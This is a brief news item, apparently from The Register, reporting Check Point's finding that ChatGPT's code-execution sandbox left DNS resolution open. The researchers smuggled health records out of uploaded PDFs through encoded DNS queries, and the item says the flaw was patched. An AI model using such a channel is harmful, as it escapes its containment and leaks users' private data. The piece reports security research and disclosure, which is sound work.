theregister.com
|
ksl
|
|
Check Point researchers found that ChatGPT’s code execution sandbox blocked direct outbound web traffic but left DNS resolution wide open – a classic oversight that allowed data smuggling through encoded DNS queries to attacker-controlled servers. The proof of concept exfiltrated personal health information and lab results from uploaded PDFs, while ChatGPT itself assured users their files were stored securely. OpenAI patched the flaw on February 20, 2026. DNS as an exfiltration channel is one of the oldest tricks in offensive security, and the fact that it worked inside a supposedly sandboxed AI environment is a reminder that these code execution containers are being scrutinized by the same researchers who audit enterprise infrastructure. Every AI platform offering file upload and code execution is now a target for sandbox escape and side-channel research.
